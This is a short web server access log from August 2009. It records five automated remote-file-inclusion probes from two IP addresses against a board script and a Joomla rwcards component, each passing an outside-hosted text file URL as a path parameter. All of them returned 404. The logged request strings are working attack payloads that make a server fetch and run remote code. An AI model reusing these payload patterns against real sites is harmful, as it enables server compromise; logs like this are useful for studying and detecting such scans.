207.58.163.86 - - [03/Aug/2009:06:09:55 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/sql.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:06:09:55 -0400] "GET /logs///skin/ggambo7002_board/sql.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:06:09:55 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/sql.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:06:10:22 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:06:10:22 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
